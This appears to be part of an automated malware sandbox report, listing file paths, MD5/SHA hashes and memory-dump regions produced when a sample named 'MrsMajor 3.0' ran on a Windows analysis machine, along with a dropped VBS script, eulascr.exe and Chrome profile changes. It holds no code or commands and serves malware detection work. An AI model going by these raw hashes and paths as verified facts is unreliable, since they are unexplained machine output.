| SHA256 | da12c4cc1ebd71b196fa55f9c350843c411ab1808fd7cd21df9dcb15933e8826 |
| SHA512 | 1380014db39d64d7bef9494a5f1152df5839f957150e4c7920c8eebfe8ae93770a8187713595268d9d2fd44435124b32188e04af57c9745137174caf7f6d2d0b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | 5aefc5f9e62acd9c55678544618242e9 |
| SHA1 | c04f4c1146ddaeb510d531574e5b80deaa05b7f1 |
| SHA256 | 310f7e79218d112bf01d986091e9b1aeab7d6ac99643ae69ce6b04706eaf2706 |
| SHA512 | 00a524ad13d52e508e7014e8101c126f62f532adf0f007748306e0ee6c4fecac9a6d68b2d17fd134fa224419dd150349d7e436edd56612f20fc17aa1f97ffdf5 |
C:\Users\Admin\Downloads\MrsMajor 3.0.7z
| MD5 | fedb45ddbd72fc70a81c789763038d81 |
| SHA1 | f1ed20c626d0a7ca2808ed768e7d7b319bc4c84a |
| SHA256 | eacd5ed86a8ddd368a1089c7b97b791258e3eeb89c76c6da829b58d469f654b2 |
| SHA512 | 813c0367f3aeceea9be02ffad4bfa8092ea44b428e68db8f3f33e45e4e5e53599d985fa79a708679b6957cbd04d9b9d67b288137fa71ac5a59e917b8792c8298 |
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
| MD5 | 35a27d088cd5be278629fae37d464182 |
| SHA1 | d5a291fadead1f2a0cf35082012fe6f4bf22a3ab |
| SHA256 | 4a75f2db1dbd3c1218bb9994b7e1c690c4edd4e0c1a675de8d2a127611173e69 |
| SHA512 | eb0be3026321864bd5bcf53b88dc951711d8c0b4bcbd46800b90ca5116a56dba22452530e29f3ccbbcc43d943bdefc8ed8ca2d31ba2e7e5f0e594f74adba4ab5 |
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
| MD5 | 35a27d088cd5be278629fae37d464182 |
| SHA1 | d5a291fadead1f2a0cf35082012fe6f4bf22a3ab |
| SHA256 | 4a75f2db1dbd3c1218bb9994b7e1c690c4edd4e0c1a675de8d2a127611173e69 |
| SHA512 | eb0be3026321864bd5bcf53b88dc951711d8c0b4bcbd46800b90ca5116a56dba22452530e29f3ccbbcc43d943bdefc8ed8ca2d31ba2e7e5f0e594f74adba4ab5 |
C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\DDDC.tmp\DDDD.vbs
| MD5 | 3b8696ecbb737aad2a763c4eaf62c247 |
| SHA1 | 4a2d7a2d61d3f4c414b4e5d2933cd404b8f126e5 |
| SHA256 | ce95f7eea8b303bc23cfd6e41748ad4e7b5e0f0f1d3bdf390eadb1e354915569 |
| SHA512 | 713d9697b892b9dd892537e8a01eab8d0265ebf64867c8beecf7a744321257c2a5c11d4de18fcb486bb69f199422ce3cab8b6afdbe880481c47b06ba8f335beb |
C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe
| MD5 | 8b1c352450e480d9320fce5e6f2c8713 |
| SHA1 | d6bd88bf33de7c5d4e68b233c37cc1540c97bd3a |
| SHA256 | 2c343174231b55e463ca044d19d47bd5842793c15954583eb340bfd95628516e |
| SHA512 | 2d8e43b1021da08ed1bf5aff110159e6bc10478102c024371302ccfce595e77fd76794658617b5b52f9a50190db250c1ba486d247d9cd69e4732a768edbb4cbc |
C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe
| MD5 | 8b1c352450e480d9320fce5e6f2c8713 |
| SHA1 | d6bd88bf33de7c5d4e68b233c37cc1540c97bd3a |
| SHA256 | 2c343174231b55e463ca044d19d47bd5842793c15954583eb340bfd95628516e |
| SHA512 | 2d8e43b1021da08ed1bf5aff110159e6bc10478102c024371302ccfce595e77fd76794658617b5b52f9a50190db250c1ba486d247d9cd69e4732a768edbb4cbc |
memory/3668-706-0x00000000004E0000-0x000000000050A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll
| MD5 | 42b2c266e49a3acd346b91e3b0e638c0 |
| SHA1 | 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1 |
| SHA256 | adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29 |
| SHA512 | 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81 |
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll
| MD5 | 42b2c266e49a3acd346b91e3b0e638c0 |
| SHA1 | 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1 |
| SHA256 | adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29 |
| SHA512 | 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81 |
memory/3668-713-0x00007FFE71D20000-0x00007FFE71E6E000-memory.dmp
memory/3668-714-0x000000001B310000-0x000000001B320000-memory.dmp
memory/3668-715-0x000000001D720000-0x000000001D8E2000-memory.dmp
memory/3668-716-0x000000001DE20000-0x000000001E348000-memory.dmp
memory/3668-717-0x000000001B310000-0x000000001B320000-memory.dmp
memory/3668-718-0x000000001B310000-0x000000001B320000-memory.dmp
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
| MD5 | 35a27d088cd5be278629fae37d464182 |
| SHA1 | d5a291fadead1f2a0cf35082012fe6f4bf22a3ab |
| SHA256 | 4a75f2db1dbd3c1218bb9994b7e1c690c4edd4e0c1a675de8d2a127611173e69 |
| SHA512 | eb0be3026321864bd5bcf53b88dc951711d8c0b4bcbd46800b90ca5116a56dba22452530e29f3ccbbcc43d943bdefc8ed8ca2d31ba2e7e5f0e594f74adba4ab5 |
C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\4A90.tmp\4A91.vbs
| MD5 | 3b8696ecbb737aad2a763c4eaf62c247 |
| SHA1 | 4a2d7a2d61d3f4c414b4e5d2933cd404b8f126e5 |
| SHA256 | ce95f7eea8b303bc23cfd6e41748ad4e7b5e0f0f1d3bdf390eadb1e354915569 |
| SHA512 | 713d9697b892b9dd892537e8a01eab8d0265ebf64867c8beecf7a744321257c2a5c11d4de18fcb486bb69f199422ce3cab8b6afdbe880481c47b06ba8f335beb |
C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe
| MD5 | 8b1c352450e480d9320fce5e6f2c8713 |
| SHA1 | d6bd88bf33de7c5d4e68b233c37cc1540c97bd3a |
| SHA256 | 2c343174231b55e463ca044d19d47bd5842793c15954583eb340bfd95628516e |
| SHA512 | 2d8e43b1021da08ed1bf5aff110159e6bc10478102c024371302ccfce595e77fd76794658617b5b52f9a50190db250c1ba486d247d9cd69e4732a768edbb4cbc |
C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe
| MD5 | 8b1c352450e480d9320fce5e6f2c8713 |
| SHA1 | d6bd88bf33de7c5d4e68b233c37cc1540c97bd3a |
| SHA256 | 2c343174231b55e463ca044d19d47bd5842793c15954583eb340bfd95628516e |
| SHA512 | 2d8e43b1021da08ed1bf5aff110159e6bc10478102c024371302ccfce595e77fd76794658617b5b52f9a50190db250c1ba486d247d9cd69e4732a768edbb4cbc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\eulascr.exe.log
| MD5 | 8b325485d0cc4762f87c0857e27c0e35 |
| SHA1 | 1514778327d7c7b705dbf14f22ff9d8bdfdca581 |
| SHA256 | c18709d3ab63bebbbeba0791cd188db4121be8007c896a655d7f68535026cadf |
| SHA512 | 9bf9da14e50301d68246dc9f3a21319a8fbfc866d5b57ee44cd9ed96c1a6dfecabcec06b66be5ec5625ff708d460e23d00849c581957ab84c4f2941cee07ff33 |
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll
| MD5 | 42b2c266e49a3acd346b91e3b0e638c0 |
| SHA1 | 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1 |
| SHA256 | adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29 |
| SHA512 | 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81 |
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll
| MD5 | 42b2c266e49a3acd346b91e3b0e638c0 |
| SHA1 | 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1 |
| SHA256 | adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29 |
| SHA512 | 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81 |
memory/3160-732-0x00007FFE71C70000-0x00007FFE71DBE000-memory.dmp
memory/3160-733-0x0000000002660000-0x0000000002670000-memory.dmp
memory/3160-734-0x0000000002660000-0x0000000002670000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
| MD5 | d9a49a7d6d5ca840cf0f0e937007e278 |
| SHA1 | 90197e483cc1bf8970cb6012997b1968f43d8e78 |
| SHA256 | 183acf4a52e283da352ac2e3d51d43dbdd1534325f4585b6763a4ef38151b876 |
| SHA512 | 142acbf150500db5f703b3e56c42895cb4374927f6e26adb02f090cf18e9797b8f4e34b7e621de6daf03093cc0a7df73cb4328525ac7a1a4f36e2b61dfde0642 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | d5aa436f438bef1f8801fe7aea488da4 |
| SHA1 | fe3fccaeaee75c2addcb31ddb74a609fa9e47873 |
| SHA256 | 53e51ffd114b6690845f9206d0584783c37637db83a91286d25703a725d25200 |
| SHA512 | f4d08c551c6ff43c7136199806da7d6db8d3aed894d81f60123ac9021cad165d03052ac5f5b6b1feb92f67f590d06e40ba9871daabeacc80c3be392992c4f1ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | d5aa436f438bef1f8801fe7aea488da4 |
| SHA1 | fe3fccaeaee75c2addcb31ddb74a609fa9e47873 |
| SHA256 | 53e51ffd114b6690845f9206d0584783c37637db83a91286d25703a725d25200 |
| SHA512 | f4d08c551c6ff43c7136199806da7d6db8d3aed894d81f60123ac9021cad165d03052ac5f5b6b1feb92f67f590d06e40ba9871daabeacc80c3be392992c4f1ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c3070def907702e814377ffa8079b8f9 |
| SHA1 | c686308db2c2ee6401d6b97db17745c15e39ded9 |
| SHA256 | 695824558a027eaefc38914e35cdaebfcfe328ca8025118766ca434aef765084 |
| SHA512 | 3554206091c841812edcaee234771df819729e49cfc67370b45083f32b22b9ac8d9294ac4abdea1ca81db5bc34108e8758aac4a68c1210565dd48b3b012afba3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | bc6142469cd7dadf107be9ad87ea4753 |
| SHA1 | 72a9aa05003fab742b0e4dc4c5d9eda6b9f7565c |
| SHA256 | b26da4f8c7e283aa74386da0229d66af14a37986b8ca828e054fc932f68dd557 |
| SHA512 | 47d1a67a16f5dc6d50556c5296e65918f0a2fcad0e8cee5795b100fe8cd89eaf5e1fd67691e8a57af3677883a5d8f104723b1901d11845b286474c8ac56f6182 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 9eae63c7a967fc314dd311d9f46a45b7 |
| SHA1 | caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf |
| SHA256 | 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d |
| SHA512 | bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | 875cc6f9141a5c93476be6970db1ab5f |
| SHA1 | a546544c034c5d063391aaafed2365ee9f6cac3d |
| SHA256 | 89c0f9c432dd8f3e9f568c90626c804bd7ab76b557992c2b8048a569911abf67 |
| SHA512 | 4ac3f06a79b7d6be3e76fb177582fc52af0fad234610103a926a26fb076e1f60f91f752c6952b8539eac1303d43700705f001aa2df48ed67ceab72d9f9eabeb9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 4ebc570ee8f5fdc195ec374e88e8f746 |
| SHA1 | 4d2c35a7cfd60c0735e3ae3fcb538f93eff2cedd |
| SHA256 | 49daddb76d41fa560b745938f815071dce4ad957072b8feba22aa12263dedad9 |
| SHA512 | ff5d930200d8b4a1e41fd1eebab3a191ea472c2475ac5ad655343649d62661478cfa9e8ae2ae9b81dab66b2cd058906ae54d904ed67138ba3c8d29d89270508f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3
| MD5 | 34fc63e87d0eb536e1d98399b0e951d9 |
| SHA1 | 9c20789c089323aae67f302855c9320c72ded26d |
| SHA256 | a49813cfbb7a625261c2401f800f718c6691bc9cdc78a102549c6e493c1cf8aa |
| SHA512 | 7a67305eab34c0bf44700276113a78589760fee33c7b8834286e4708c93fb79f3dc25c962b1d41e96dd200fce0c039f6948a88efcad9a9c9a31a4a855010d2fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0
| MD5 | d2177ccae16d86bb77798b7de90441cd |
| SHA1 | f366fd3de8d0667e6e46bf556c60806c20f4b241 |
| SHA256 | f7d2f6c909c0fa7cc8c00016c5ec47bd5334c49edbe0c71bd1d90dd33de44fe5 |
| SHA512 | dbbe6ccd25f944d13380d07d78773a0d59113b11d67529f8b92a7e85cf99f4f4e6289e5e90809153fa5aff27457a5f30f1f227147733977fc6601dc5a52b201c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Favicons
| MD5 | d78d86a3b7ebf4589ebc8ebce2f32af0 |
| SHA1 | 4fca3c641ded3984b8fd81f7f22971e62d0f1210 |
| SHA256 | 26d3440123fe211f1c4278f98df2e4d20b74c6a3e7f6f9856d018d151bf68902 |
| SHA512 | a68d4934c06c4a60ecbe87697305b4fbc444aa25a3d58e90963f90d195c1006aa153cd811c06889e9450ef2bfc3d283d597ebbed78741a15b4867716f75f2840 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | db23ffbd0c8d44c34799b9e133500dc0 |
| SHA1 | 75f42977a7b18e3301f43ff0e5f1a8c1e2753d5e |
| SHA256 | 5e5c6d1b385fcca93de194412675fde8b3a9c82bfbce97b1945118e1a7c9ba2e |
| SHA512 | 990b24ef507370c3020296bc82cef235a175b9a462aadaebb887924ea3ad353411f808cf08480131b4407560853c3c4a788a0df56bb44e86c962b62da4872779 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fc0d8a1fd1bb352afea82308c8529257 |
| SHA1 | 6b5e4c9c04b9bbe1c2634c38a4ce40563c7d430a |
| SHA256 | f655355f86c935299e2163e06224a9f751d5dfbd55649f12950a5208b391fc46 |
| SHA512 | f4dea400db00d353c15f822a86880ab381017a8e7f2b18b397f28ee08cd92b846d2599f243b4899fdad36ec2b26015c9dd64ac6db1b2f4ab1b523a80273df552 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
| MD5 | c8f387482617c676695a4821766d57f8 |
| SHA1 | e385122678cddfce76e508367954d9ed52e399d2 |
| SHA256 | 952eda94609f26071c4d2993b459e9e35917d5a5efbbdeb78f5588cdc9494264 |
| SHA512 | fe8a7858f53252672c2f86317002c7310d1d25332cfa05ef1d23f155c3489da0381d32f8dabae84d04a3d9a99dc8ca6a9b1637ae5538271b9f5df0a5fa1b909e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2
| MD5 | 69c2c4a48b61c17a03b63da5a71703f3 |
| SHA1 | 05c2a44bcaa745decf5601d7c4f9ef10f02dca87 |
| SHA256 | cc3c36efcadec41f027010fdd901669b1d1aaea93d1be744521d13776d418347 |
| SHA512 | 61f8bee269d0ad14c9354ec450e64c8d7c5dedbda333a64293a2bcd1e308693925c66bc5ced96914d2883def160ad26bab613e1d899378d9595e8b8a451e499c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 9fe1421bde419322bd1a45b6abfb92fa |
| SHA1 | 840b54b380afc116fad8ff76741b37288d71e291 |
| SHA256 | 9e5fc06f0851c31973f53eccbbc1436f2cdb3ecea1c8b78b5d3a69754a3a0399 |
| SHA512 | 177766eadd9e0df42c0c5d12b09789a83b363d4b2ec0f675f7ebcc6f74248e8d4c89368f7c4c52aaccc4d03c9bc06dda9dd84460111288e7f48c420efa0ce0b5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e14a020e961a1a5348a10aa9dfc68475 |
| SHA1 | 705bcd488c3b7995154f882625bf611506675b3a |
| SHA256 | dd6d34c3dfa8742c6ab6671350142376c6fe689096ab0e605a31e18fab09c694 |
| SHA512 | 14a7313ecb26631112573712a91ae34c7d48288aa9374dcae0b3ef75c8e5b9fa9838f3c62caf04184a97aa61b4735d3a71e90bdc7f8b377ac2e44b2c9a2fd532 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c02f37403b57b3ea50e382e27ae3f595 |
| SHA1 | 3b2c268ec39b6c3619e16338a46a0b6490fb1080 |
| SHA256 | 84fbd31bf5f72be00b2f8e02ab6b8eb2e92051063024bee28fd118866ff05788 |
| SHA512 | d0d568a8a3e0e3ef78a7f114b160285d3143ca47258768c23396992258ee720530b1bc22d180eb33a186c3074c3f693f17803c22004219a782578191fe80a33a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 39884eccfc1ce4fdc1b1b59b5d124a8f |
| SHA1 | ebaefe1b04f321d4fbdda274e779a389fcdf578c |
| SHA256 | a418a9260b609359988b26fc5669b18f7e40167e2976d70896b2101c5f61b1c7 |
| SHA512 | 86394a12300f65b05f8063e3b23733a351f532b06d9634321a9426c644ab9d398ac77244e32d9b432cb30dabcd936d17cd9a9f03028c32f9c13ece5bef4825b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0577d44d5d75ae49e0d6259a9dcd2fc5 |
| SHA1 | dd2cd2902d5b2cec74f7243f71585ccbf683ecc6 |
| SHA256 | 1ecbdc1dd3553613f558341c89b7a51ecaeeedb92b875da2039fa25deb2a77d0 |
| SHA512 | f94f3668b5e4e280c09766c059644da598430377e96bd3c1a757216ec4106e9bcf42fe5fcf098a4c0cc9443d3daf2fb60c2b1e33417f2a52c60e90073a9eee81 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 313aaa42b3a144fe99371b810b4e6923 |
| SHA1 | 06e104dce81deb6338cd03970d6f85d47c221a85 |
| SHA256 | be70718f1321f089d5fe77ce9ca9c2f72e79f19f1288a1a2e27f6e8e071e9b06 |
| SHA512 | deaffcb94b96de03d2bed8967bb291dadd170d9948a7b800a26d22ec0cca720a6975af741fabad7212ddf8949e9aaa6c283d086aae9c2d75013a4649dc7d4a68 |
C:\Users\Admin\Downloads\BUG32.rar.crdownload
| MD5 | bb3451472e92540643074f3046a58288 |
| SHA1 | 709f6cf0c6504dd2052ab7fc7f67e0230f77a203 |
| SHA256 | 0b1d32d337881347c6451823ac5469568e8ed4f46692f50b52d70391ebfb672e |
| SHA512 | a4a3035c21bb1eabc71ace4b67b015d15f839168fb8bca1b9528a35b2effc0c95b78b31edc2c54ceb52a3a3d8cf3797280c556ebe6912b7805d77dcf1eb8592c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9d06bbfcacd95d5991953c58052a1108 |
| SHA1 | 8a4c2b959e061ae357fcad619e6282e3f049f083 |
| SHA256 | 77235537281ceae3457c7ee6cafa12e10e73d46bce8635b4cb7d5fe3da7f9619 |
| SHA512 | 4ad91ea4f2db54e0d36c7399d17ebc797a42233db19443886357655636659e9967ebb989f94b8553c4469f5f5fb4995e7839c09a86ff7737d6e04f68c2b985e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d4a999a228121b26fc26c4746a6803ed |
| SHA1 | e85dbab65504bd74235840b9db0328a6c724cc4f |
| SHA256 | ffce09ae4ec47767ff28f8a54c2e51cbb79e8f6deb69c9b452e577c659915499 |
| SHA512 | 4dbea5e57fc352156f8b600742e328a58376c298a0570e7ce24edcd13377ecc447545be27c10a8587b30cf260f51b489421dcec821ef31ed609b16c4b66c9fe4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3a477be0a0cd460c97b06d048cc8b05e |
| SHA1 | dc47301b54ecc0ad428ef1ae4e3f3cca740dc7ec |
| SHA256 | a6305a8960f6e907fa4244fccca8d3b43ea74809f546026bd025e223c5491fcd |
| SHA512 | e8b3c51f21c5c87a9c42ca59cc1e01f3b25451132e6cc9d6d2e9c9ce7830e86cd6530efba84a104808708176028b32606537094468014ae47e5776d699f082ba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 661027bf6657eb01e6cb0d4e5e57d598 |
| SHA1 | 8928d1ad32ef570a8b012ac8a919562865713cbf |
| SHA256 | 1846eb6cf85b32061ca241d6b13ca753a1c15b1835c771f0cb2de30b909c2ce8 |
| SHA512 | 5352aaf445d6a2c6d53b8616a521bd72523ba000aa81522f83257e41533eff54ee42fcff4539f1b091ec4e521a0fe9c8800313f7291815c99aa24293dbd5fa31 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c30aa7241bcad12d9e2a2571d81038b8 |
| SHA1 | 5d615acfdcc85ae6f401a4098fc6784d413e1c8e |
| SHA256 | 9c712407c2e5ca99a1ac6479182c82212deebf229f78d4dce26a8ddaf23afea5 |
| SHA512 | 46eef6322aafe63c6bbd91e88276d995cc45d5b4e8a474b492bfc652ad89375d108356b62d47f24f52420be242c82d3560ff6d9579417f18c283864f726f93f2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | d6759da50ee5a07863cda56cb089face |
| SHA1 | 88c02af048af957cd671c401db5eaf916cb39788 |
| SHA256 | 044c3178c09fbfd71707924d6971edb048ae8b62d6811ae4283cb20f102bca69 |
| SHA512 | fadf5cb9b31b65b9f307ff4c438778f9f5ce9b0a9430a2a8f3151eaa874d738263b0579d0b816a53617bda688993526b12dd452be330d891f93fbea9b32e1a84 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d27a8e07948d43aa50822a386264940c |
| SHA1 | cb81478ae2035291c3dc210feb0f7baa47ab522f |
| SHA256 | c182f1e9260c3977555924064e5b13017ff47a9f2f1e07df50c0ba9b6a3c604e |
| SHA512 | f312824b50dd7ed77ee5e5ca8dea98f9911b3ea56d35778e3d4e76a8e3918e740ae0e61f816b9be55f188a3c67bdaab916b9efb39df2107d501de24bc0c30a4b |
C:\Users\Admin\Desktop\AddOptimize.mpe
| MD5 | 7999f942ff7190cb7c9f0e04d6dc3d41 |
| SHA1 | 66c3743d7a3d0885a624600abd71486c63a52904 |
| SHA256 | 8c52ba6df441fea41e87285a7a79e790773407b4d377730b4f834b067d355776 |
| SHA512 | 9ea2f9e0e81b69895023da6a5e6f4850bdfb0e37d847a6086afaa3debb928673276fa149b2e8df154f6b0498191e5e7ab29c22bc415a761038435abcc4607cee |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms
| MD5 | b2bdf8031844b625175d226a29bcd6fd |
| SHA1 | d85f7289bb339d5f7c2c1154c3df4bf3228e6af7 |
| SHA256 | 3b8557067bff49e82e5b0c2771d26ad6db041a120f8573b5defdc2e1338c4eb7 |
| SHA512 | 9a41d45ad0e27a632ac19c7f8952b1ad41497c6a668be17ad3dd49e9b0e607c54cdf2d4788307244d8a8ef013a43d6b4a4d030dafea163cbfcc63364701e7d9b |
memory/112-2371-0x0000000000040000-0x000000000004C000-memory.dmp
memory/112-2372-0x0000000004F40000-0x00000000054E4000-memory.dmp
memory/112-2373-0x0000000004A30000-0x0000000004AC2000-memory.dmp
memory/112-2380-0x0000000004A00000-0x0000000004A0A000-memory.dmp
memory/112-2400-0x0000000004BE0000-0x0000000004BF0000-memory.dmp
memory/1320-2512-0x0000000005350000-0x0000000005360000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003e
| MD5 | 66d514f7a4e15967dd615da85477a4fc |
| SHA1 | c5a54d294d0e31d2af5f0aee49e2b762d343899b |
| SHA256 | 862beacad0e0cf5c98ac73d8125cefbad0612fe5cd62afd431879347f8b51a4a |
| SHA512 | ac67c6e691a33997cb6c118ccef1f68418b2b18dcb2c31220cb73692f1c7119865c2fb337b2a7c266426d40f8c0d472413ab7996b8a8444e1b300282b4a49569 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d738a61dc061250e61d917a454c18127 |
| SHA1 | 1ec869bfc61753b3f3b93b966f80ddac8ac59f70 |
| SHA256 | 5174aff609f711a0d29d4bf9555c73b2519b541e4479ee1193f0b0835b52ed39 |
| SHA512 | 350c7235bff95be388a169f0bbad6329b71a6e24b1b19db944255347f49216fc8f8d0e5dc7a19007b3e85c115adb8a61329f30663a040b10fbe8cbdd05816e41 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RFe628651.TMP
| MD5 | c7299e90f4b030b36a20e9c58729b798 |
| SHA1 | 09aaf935cb62b44a23077895273e3e5eed3b117a |
| SHA256 | c55efd0a30e19132f365b3713f5325f368fd577fddeef6cf1f294110b715e72d |
| SHA512 | a848e14a2da41e66112750880dfba89aef98cde74bcb8292a480281dbc3338aa2c3bc8d9a0f9a3fb73de06fe3abfab56b78b284486c265f962ff35fff1d9ea19 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 9c220c57d0452aaefd4a3c87f57c242b |
| SHA1 | 9a965f56cecb4efe83db4a2eb6a395b752d212c9 |
| SHA256 | ee5ca3ad0b05d9764007be8dfb2741db19649f7d3c25ffa260c28199063894d3 |
| SHA512 | ec629a480546e5075cdba46bff712828b05f9a1676bb9590ad828991d923f13ad286481e37fb81510420f8b47205b7da280d0acf8bea65c6dffbda749edbc503 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State~RFe628651.TMP
| MD5 | b375c5336eb6980ec24ff04fc952ce4f |
| SHA1 | 266ada9db41b353e49f2db65e13d824ab5f1839e |
| SHA256 | 587931e6576fda385d42927e5b5d2406da8d490ad22f2009c9707d3508fc5826 |
| SHA512 | 326868565f1beb222918032dfbd5c334ba64222993265f16fc315f34c4510e6740d1c51f18869ed139c58f5c555182352c9a9a00798e609f4e01f3ea383db968 |